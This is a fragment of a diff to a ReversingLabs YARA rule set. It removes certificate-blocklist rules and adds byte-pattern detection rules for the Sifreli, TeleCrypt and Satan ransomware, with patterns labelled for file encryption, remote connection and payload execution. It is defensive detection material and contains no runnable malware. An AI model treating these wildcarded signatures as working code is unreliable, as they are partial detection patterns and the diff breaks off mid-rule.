+		id = "974f81e2-6907-54da-97e3-3116c41b5ed4"
+		date = "2020-10-08"
+		modified = "2020-10-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L5884-L5900"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "79b6df421c78fd3e2f05a60f7d875e02519297a0278614c9f63dff8b1b2a2d18"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Win32.Ransomware.Sifreli.yara#L1-L119"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "48f6cc678bea81afece0ae203fb27b61e2c6e4f7188a3bd260190f568c9a8a06"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Sifreli"
+		tc_detection_factor = 5
 		importance = 25
 
-	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "NOSOV SP Z O O" and pe.signatures [ i ] . serial == "0b:ab:6a:2a:a8:4b:49:5d:9e:55:4a:4c:42:c0:12:6d" and 1597971600 <= pe.signatures [ i ] . not_after )
-}
-
-rule REVERSINGLABS_Cert_Blocklist_6314001C3235Cd59Bcc3F5278C518804 : INFO FILE
-{
-	meta:
-		description = "Certificate used for digitally signing malware."
-		author = "ReversingLabs"
-		id = "aff0fb76-587b-5493-810c-ac32a6ba9576"
-		date = "2023-11-08"
-		modified = "2023-11-08"
-		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L5902-L5918"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "4320f3884c0f7e4939e8988a4e83b8028a5e01fb425ae4faa2273134db835813"
-		score = 75
-		quality = 90
-		tags = "INFO, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "INFO"
-		importance = 25
+	strings:
+		$find_files = {
+            55 8B EC 83 EC ?? 53 56 57 8B 7D ?? 8B C7 8D 50 ?? 66 8B 08 83 C0 ?? 66 85 C9 75 ??
+            2B C2 D1 F8 8D 44 00 ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 50 A1 ?? ?? ?? ??
+            6A ?? 50 FF D6 8B D8 89 5D ?? 85 DB 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 57 53 FF 15 ??
+            ?? ?? ?? 8B 0D ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 51 FF D6 8B F8 85 FF 0F 84 ?? ?? ??
+            ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? E8 ?? ?? ?? ?? 3D ?? ??
+            ?? ?? 1B C0 40 A3 ?? ?? ?? ?? EB ?? A1 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 57 50 53 FF 15
+            ?? ?? ?? ?? 89 45 ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 90 F6 07 ?? 74
+            ?? BB ?? ?? ?? ?? B9 ?? ?? ?? ?? 8D 47 ?? 66 8B 10 66 3B 11 75 ?? 66 85 D2 74 ?? 66
+            8B 50 ?? 66 3B 51 ?? 75 ?? 83 C0 ?? 83 C1 ?? 66 85 D2 75 ?? 33 C0 EB ?? 33 DB EB ??
+            1B C0 83 D8 ?? 85 C0 74 ?? B9 ?? ?? ?? ?? 8D 47 ?? 8D 49 ?? 66 8B 10 66 3B 11 75 ??
+            66 85 D2 74 ?? 66 8B 50 ?? 66 3B 51 ?? 75 ?? 83 C0 ?? 83 C1 ?? 66 85 D2 75 ?? 33 C0
+            EB ?? 1B C0 83 D8 ?? 85 C0 74 ?? 8B 55 ?? 8B 4D ?? 52 8D 47 ?? 50 8B 07 50 53 68 ??
+            ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 ?? 8B 55 ?? 57 52 FF 15 ?? ?? ?? ?? 85
+            C0 0F 85 ?? ?? ?? ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 8B 5D ?? EB ?? C7 45 ?? ?? ?? ??
+            ?? 8B 0D ?? ?? ?? ?? 57 6A ?? 51 FF 15 ?? ?? ?? ?? EB ?? C7 45 ?? ?? ?? ?? ?? 8B 15
+            ?? ?? ?? ?? 53 6A ?? 52 FF 15 ?? ?? ?? ?? 8B 45 ?? 5F 5E 5B 8B E5 5D C3 5F 5E B8 ??
+            ?? ?? ?? 5B 8B E5 5D C3
+        }
+		$remote_connection_p1 = {
+            55 8B EC 83 EC ?? 53 33 DB 8D 45 ?? 89 5D ?? E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ??
+            8B 45 ?? 8B 4D ?? 56 57 50 51 E8 ?? ?? ?? ?? 8B F8 83 C4 ?? 85 FF 74 ?? 8B 55 ?? 8B
+            4D ?? 52 57 E8 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 8B F0 83 C4 ?? 85 F6 74 ?? 8B 45 ?? 6A
+            ?? 50 6A ?? 6A ?? 56 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8B D6 E8 ?? ?? ?? ?? 85 C0 74 ??
+            C7 45 ?? ?? ?? ?? ?? 56 FF D3 8D 4D ?? 51 8D 55 ?? 52 6A ?? 57 C7 45 ?? ?? ?? ?? ??
+            C7 45 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 57 8B F0 FF D3 85 F6 74 ?? 8B 45 ?? 50 FF D3
+            8B 5D ?? 83 7D ?? ?? 8B 35 ?? ?? ?? ?? 74 ?? 8B 4D ?? 8B 15 ?? ?? ?? ?? 51 6A ?? 52
+            FF D6 8B 45 ?? 85 C0 74 ?? 50 A1 ?? ?? ?? ?? 6A ?? 50 FF D6 5F 5E 8B C3 5B 8B E5 5D
+            C3 8B C3 5B 8B E5 5D C3
+        }
+		$remote_connection_p2 = {
+            55 8B EC 83 EC ?? 56 57 68 ?? ?? ?? ?? 33 FF 57 57 57 57 FF 15 ?? ?? ?? ?? 8B F0 85
+            F6 74 ?? 8B 3D ?? ?? ?? ?? B8 ?? ?? ?? ?? 6A ?? 89 45 ?? 89 45 ?? 8D 45 ?? 50 6A ??
+            56 C7 45 ?? ?? ?? ?? ?? FF D7 6A ?? 8D 4D ?? 51 6A ?? 56 FF D7 6A ?? 8D 55 ?? 52 6A
+            ?? 56 FF D7 8B 45 ?? 8B 4D ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 50 51 56 FF 15 ?? ?? ??
+            ?? 8B F8 85 FF 75 ?? 56 FF 15 ?? ?? ?? ?? 8B C7 5F 5E 8B E5 5D C3
+        }
+		$remote_connection_p3 = {
+            55 8B EC 83 EC ?? 53 56 8B F0 33 C0 89 06 57 89 46 ?? 89 46 ?? 6A ?? 50 89 46 ?? 8D
+            45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 4D ?? 51 6A ?? BF ?? ?? ?? ?? 6A ?? 68 ?? ?? ??
+            ?? C7 45 ?? ?? ?? ?? ?? 89 7D ?? 89 7D ?? 89 7D ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ??
+            ?? ?? ?? 8B 4D ?? 8B 1D ?? ?? ?? ?? 8D 4C 09 ?? 33 C0 85 C9 74 ?? 8B 15 ?? ?? ?? ??
+            51 50 52 FF D3 89 06 85 C0 0F 84 ?? ?? ?? ?? 8B 4D ?? 8B 55 ?? 51 52 50 E8 ?? ?? ??
+            ?? 8B 06 8B 55 ?? 33 C9 66 89 0C 50 8B 4D ?? 83 C4 ?? 85 C9 74 ?? 8B 45 ?? 66 83 38
+            ?? 75 ?? 83 45 ?? ?? 2B CF 89 4D ?? 85 C9 75 ?? 8B 55 ?? 8D 7C 0A ?? 8D 54 3F ?? 33
+            C0 85 D2 74 ?? 52 50 A1 ?? ?? ?? ?? 50 FF D3 8B 4D ?? 89 46 ?? 85 C0 74 ?? 51 8B 4D
+            ?? 51 83 C0 ?? 50 E8 ?? ?? ?? ?? 8B 55 ?? 8B 45 ?? 8B 4E ?? 52 8B 55 ?? 50 8D 44 51
+            ?? 50 E8 ?? ?? ?? ?? 8B 46 ?? B9 ?? ?? ?? ?? 66 89 08 33 D2 66 89 14 78 66 8B 45 ??
+            83 C4 ?? 83 7D ?? ?? 66 89 46 ?? 75 ?? 83 4E ?? ?? 5F 5E B8 ?? ?? ?? ?? 5B 8B E5 5D
+            C3 8B 36 85 F6 74 ?? 8B 0D ?? ?? ?? ?? 56 6A ?? 51 FF 15 ?? ?? ?? ?? 5F 5E 33 C0 5B
+            8B E5 5D C3
+        }
+		$encrypt_files_1 = {
+            8B C3 8D 50 ?? 66 8B 08 83 C0 ?? 66 85 C9 75 ?? 2B C2 D1 F8 57 8B F8 8D 4C 3F ?? 33
+            C0 85 C9 74 ?? 51 50 A1 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 56 8B F0 8B CB
+            2B F3 8D 9B ?? ?? ?? ?? 0F B7 11 66 89 14 0E 83 C1 ?? 66 85 D2 75 ?? B9 ?? ?? ?? ??
+            8D 34 3F 2B F1 03 F0 EB ?? 8D 49 ?? 0F B7 11 66 89 14 0E 83 C1 ?? 66 85 D2 75 ?? 5E
+            5F C3
+        }
+		$encrypt_files_2 = {
+            83 E8 ?? 53 56 57 8B DA 74 ?? 48 74 ?? 5F 5E 33 C0 5B C3 53 51 33 F6 E8 ?? ?? ?? ??
+            83 C4 ?? 85 C0 74 ?? E8 ?? ?? ?? ?? 8B F0 33 FF 85 F6 74 ?? 56 53 FF 15 ?? ?? ?? ??
+            85 C0 74 ?? BF ?? ?? ?? ?? A1 ?? ?? ?? ?? 56 6A ?? 50 FF 15 ?? ?? ?? ?? 8B F7 5F 8B
+            C6 5E 5B C3 53 51 33 F6 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 ?? E8 ?? ?? ?? ?? 8B F0 33
+            FF 85 F6 74 ?? 56 53 FF 15 ?? ?? ?? ?? 85 C0 74 ?? BF ?? ?? ?? ?? 8B 0D ?? ?? ?? ??
+            56 6A ?? 51 FF 15 ?? ?? ?? ?? 8B F7 5F 8B C6 5E 5B C3 ?? ?? 55 8B EC 8B 4D ?? 8B 41
+            ?? 83 F8 ?? 0F 8F ?? ?? ?? ?? F7 45 ?? ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 40 53 89 41 ??
+            8B 45 ?? 83 E8 ?? 56 57 74 ?? 48 0F 85 ?? ?? ?? ?? 8B 7D ?? 33 F6 8D 9B ?? ?? ?? ??
+            8B 86 ?? ?? ?? ?? 50 57 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 ?? ?? ?? ?? 83 C6 ?? 83
+            FE ?? 72 ?? 8B 5D ?? E8 ?? ?? ?? ?? 8B F0 85 F6 74 ?? 8B 4D ?? 51 56 E8 ?? ?? ?? ??
+            83 C4 ?? EB ?? 8B 41 ?? 83 E8 ?? 74 ?? 48 75 ?? 8B 75 ?? E8 ?? ?? ?? ?? EB ?? 8B 75
+            ?? 8B C6 E8 ?? ?? ?? ?? F7 D8 1B C0 F7 D8 85 C0 74 ?? 8B 5D ?? 8B FE E8 ?? ?? ?? ??
+            8B F0 85 F6 74 ?? 8B 7D ?? 8B 47 ?? 8B 0F 8B D6 E8 ?? ?? ?? ?? 85 C0 74 ?? 8B 47 ??
+            85 C0 74 ?? 50 FF 15 ?? ?? ?? ?? 8B C6 E8 ?? ?? ?? ?? 8B 45 ?? FF 48 ?? 5F 5E 5B B8
+            ?? ?? ?? ?? 5D C3
+        }
+		$encrypt_files_3 = {
+            8B C6 8D 50 ?? 66 8B 08 83 C0 ?? 66 85 C9 75 ?? 2B C2 D1 F8 83 C0 ?? 85 C0 7E ?? EB
+            ?? 8D 49 ?? 66 83 3C 46 ?? 74 ?? 48 85 C0 7F ?? 33 C0 C3 8D 44 46 ?? 85 C0 74 ?? 83
+            C0 ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? B8 ?? ?? ?? ?? C3
+        }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "GIE-MUTUALISTE" and pe.signatures [ i ] . serial == "63:14:00:1c:32:35:cd:59:bc:c3:f5:27:8c:51:88:04" and 1600304400 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( $find_files ) and ( all of ( $encrypt_files_* ) ) and ( all of ( $remote_connection_p* ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_0Ed8Ade5D73B73Dade6943D557Ff87E5 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Telecrypt : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects TeleCrypt ransomware."
 		author = "ReversingLabs"
-		id = "dbfae40c-2f81-5daf-8655-d06ae38ffa8f"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "c4eada2d-72c0-5efe-bf2b-8f053348d89d"
+		date = "2020-07-15"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L5920-L5936"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "7796b6e7da900be8634e7f1e51cda1275ab1e7c2709af7ecaa8777ab0b518494"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Win32.Ransomware.TeleCrypt.yara#L1-L109"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "9d856eae4369cd7ba1d88bd6ef37931e069127e2c05a84a44f5274f681e83fc0"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "TeleCrypt"
+		tc_detection_factor = 5
 		importance = 25
 
-	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Rumikon LLC" and pe.signatures [ i ] . serial == "0e:d8:ad:e5:d7:3b:73:da:de:69:43:d5:57:ff:87:e5" and 1597885200 <= pe.signatures [ i ] . not_after )
-}
-
-rule REVERSINGLABS_Cert_Blocklist_0292C7D574132Ba5C0441D1C7Ffcb805 : INFO FILE
-{
-	meta:
-		description = "Certificate used for digitally signing malware."
-		author = "ReversingLabs"
-		id = "ef58cf01-9c54-5dbb-99a7-d3ca42663133"
-		date = "2023-11-08"
-		modified = "2023-11-08"
-		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L5938-L5954"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "d2bcf72f4c5829d161bc40e820eb0b1a85deaa49b749422d5429e27b7fb2b1fe"
-		score = 75
-		quality = 90
-		tags = "INFO, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "INFO"
-		importance = 25
+	strings:
+		$encrypt_file = {
+            57 E8 ?? ?? ?? ?? 89 03 EB ?? 6A ?? E8 ?? ?? ?? ?? 89 03 66 83 BB ?? ?? ?? ?? ?? 0F
+            85 ?? ?? ?? ?? 8B 03 50 E8 ?? ?? ?? ?? 83 F8 ?? 75 ?? 66 81 7B ?? ?? ?? 75 ?? E8 ??
+            ?? ?? ?? 66 89 83 ?? ?? ?? ?? E9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 66 89 83 ?? ?? ?? ?? E9
+            ?? ?? ?? ?? 0F B7 05 ?? ?? ?? ?? 66 89 83 ?? ?? ?? ?? E9 ?? ?? ?? ?? C7 43 ?? ?? ??
+            ?? ?? 6A ?? 68 ?? ?? ?? ?? 52 6A ?? 6A ?? 50 8D 43 ?? 50 E8 ?? ?? ?? ?? 83 F8 ?? 75
+            ?? 66 C7 43 ?? ?? ?? E8 ?? ?? ?? ?? 8B F0 E9 ?? ?? ?? ?? 89 03 66 81 7B ?? ?? ?? 0F
+            85 ?? ?? ?? ?? 66 C7 43 ?? ?? ?? 6A ?? 8B 03 50 E8 ?? ?? ?? ?? 8B F8 83 FF ?? 75 ??
+            8B C3 E8 ?? ?? ?? ?? 8B F0 E9 ?? ?? ?? ?? 81 EF ?? ?? ?? ?? 85 FF 7D ?? 33 FF 6A ??
+            6A ?? 57 8B 03 50 E8 ?? ?? ?? ?? 40 74 ?? 6A ?? 8D 44 24 ?? 50 68 ?? ?? ?? ?? 8D 83
+            ?? ?? ?? ?? 50 8B 03 50 E8 ?? ?? ?? ?? 85 C0 75 ?? 8B C3 E8 ?? ?? ?? ?? 8B F0 E9 ??
+            ?? ?? ?? F6 43 ?? ?? 74 ?? 83 3C 24 ?? 76 ?? 8B 14 24 4A 85 D2 72 ?? 42 33 FF 8D 83
+            ?? ?? ?? ?? 80 38 ?? 75 ?? 6A ?? 6A ?? 8B C7 2B 44 24 ?? 50 8B 03 50 E8 ?? ?? ?? ??
+            40 74 ?? 8B 03 50 E8 ?? ?? ?? ?? 85 C0 75 ?? 8B C3 E8 ?? ?? ?? ?? 8B F0 EB ?? 47 40
+            4A 75 ?? 66 83 BB ?? ?? ?? ?? ?? 75 ?? 0F B7 05 ?? ?? ?? ?? 66 89 83 ?? ?? ?? ?? 66
+            81 7B ?? ?? ?? 74 ?? 8B 03 50 E8
+        }
+		$server_communication = {
+            6A ?? 8D 45 ?? 50 8B 45 ?? 8B 80 ?? ?? ?? ?? 33 C9 BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A
+            ?? 8D 45 ?? 50 FF 35 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 55 ?? A1 ?? ?? ?? ?? E8 ?? ?? ??
+            ?? FF 75 ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? 8D 55 ?? E8 ?? ?? ?? ??
+            8B 4D ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? 8B 45 ?? 8B 80 ?? ?? ?? ??
+            33 C9 E8 ?? ?? ?? ?? B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? A3 ?? ?? ?? ?? B2 ?? A1 ??
+            ?? ?? ?? E8 ?? ?? ?? ?? A3 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F0 33 DB 8B CB B8 ?? ?? ??
+            ?? D3 E0 85 F0 74 ?? 8D 45 ?? 8B D3 66 83 C2 ?? E8 ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 8B 55 ?? A1 ?? ?? ?? ?? 8B 08 FF 51 ?? 43 83 FB ?? 75 ?? A1 ?? ??
+            ?? ?? 8B 10 FF 52 ?? 8B F0 4E 85 F6 7C ?? 46 33 DB 8D 4D ?? 8B D3 A1 ?? ?? ?? ?? 8B
+            38 FF 57 ?? 8B 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 43 4E 75 ?? A1 ?? ?? ?? ?? 8B 10
+            FF 52 ?? 8B F0 4E 85 F6 7C ?? 46 33 DB 6A ?? 6A ?? 8D 4D ?? 8B D3 A1 ?? ?? ?? ?? 8B
+            38 FF 57 ?? 8B 45 ?? 8B 0D ?? ?? ?? ?? 33 D2 E8 ?? ?? ?? ?? 43 4E 75 ?? 8D 55 ?? B8
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? A1 ?? ??
+            ?? ?? 8B 08 FF 91 ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 8B 45 ?? 8B 80 ?? ?? ?? ?? 33 C9 BA
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 FF 35 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 55
+            ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 8B 45 ?? 8D 55 ?? E8 ?? ?? ?? ?? 8B 4D ?? 8D 45 ?? BA ?? ?? ?? ?? E8
+        }
+		$server_communication_1 = {
+            55 8B EC 33 C9 51 51 51 51 51 53 8B D8 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 6A
+            ?? 8D 45 ?? 50 33 C9 BA ?? ?? ?? ?? 8B 83 ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 8D 45 ??
+            50 8D 55 ?? 8B 83 ?? ?? ?? ?? 8B 08 FF 91 ?? ?? ?? ?? 8B 45 ?? 8D 55 ?? E8 ?? ?? ??
+            ?? 8B 4D ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? 33 C9 8B 83 ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 33 D2 8B 83 ?? ?? ?? ?? 8B 08 FF 91 ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 8D 45 ?? 8B 15 ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? C3
+        }
+		$exec_payload = {
+            55 68 ?? ?? ?? ?? 64 FF 32 64 89 22 8B 4D ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ??
+            E8 ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? 8B 45 ?? E8 ?? ?? ??
+            ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 6A ?? 6A ?? 8D 55 ?? 33 C0 E8 ?? ?? ?? ??
+            8B 45 ?? E8 ?? ?? ?? ?? 50 8D 45 ?? E8 ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 50 E8 ?? ??
+            ?? ?? C3
+        }
+		$copy_payload = {
+            55 8B EC 6A ?? 6A ?? 6A ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 8D 55 ?? B8 ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? B2 ?? E8 ??
+            ?? ?? ?? 84 C0 75 ?? A1 ?? ?? ?? ?? 8B 00 E8 ?? ?? ?? ?? 6A ?? 8D 55 ?? B8 ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 50
+            8D 55 ?? 33 C0 E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 33 C0 5A 59
+            59 64 89 10 68 ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? C3
+        }
+		$generate_strings_to_encrypt = {
+            0F B6 05 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 B9 ?? ?? ?? ?? BA ?? ?? ?? ?? 8B 45 ??
+            E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? 0F B6 05 ?? ?? ?? ?? 50 8D
+            85 ?? ?? ?? ?? 50 B9 ?? ?? ?? ?? BA ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 95 ?? ??
+            ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? 0F B6 05 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 B9 ?? ??
+            ?? ?? BA ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ??
+            ?? 0F B6 05 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 B9 ?? ?? ?? ?? BA ?? ?? ?? ?? 8B 45
+            ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? 0F B6 05 ?? ?? ?? ?? 50
+            8D 85 ?? ?? ?? ?? 50 B9 ?? ?? ?? ?? BA ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 95 ??
+            ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? 0F B6 05 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 B9 ??
+            ?? ?? ?? BA ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8D 45 ?? E8 ?? ??
+            ?? ?? 0F B6 05 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 B9 ?? ?? ?? ?? BA ?? ?? ?? ?? 8B
+            45 ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? 0F B6 05 ?? ?? ?? ??
+            50 8D 85 ?? ?? ?? ?? 50 B9 ?? ?? ?? ?? BA ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 95
+            ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? 0F B6 05 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 B9
+            ?? ?? ?? ?? BA ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8D 45 ?? E8 ??
+            ?? ?? ?? 0F B6 05 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 B9 ?? ?? ?? ?? BA ?? ?? ?? ??
+            8B 45 ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8D 45 ?? E8
+        }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "TES LOGISTIKA d.o.o." and pe.signatures [ i ] . serial == "02:92:c7:d5:74:13:2b:a5:c0:44:1d:1c:7f:fc:b8:05" and 1602183720 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( ( $generate_strings_to_encrypt and $encrypt_file and $server_communication and $exec_payload ) or ( $encrypt_file and $server_communication_1 and $copy_payload ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_1F23F001458716D435Cca1A55D660Ec5 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Satan : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects Satan ransomware."
 		author = "ReversingLabs"
-		id = "16614e20-1cf1-55c0-a04c-d99c06fb29a2"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "7ec379d8-172c-52ee-9284-6898dd446468"
+		date = "2020-07-15"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L5956-L5972"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "bacfb4b7900ab57d23474e0422bd74fff113296b8db37e8eae3bd456443d28d6"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Win32.Ransomware.Satan.yara#L1-L152"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "0074090c2a6cc483deffdc83dc1c0bfbd150e201c27e54f998dd2c0a7660f917"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Satan"
+		tc_detection_factor = 5
 		importance = 25
 
-	condition:
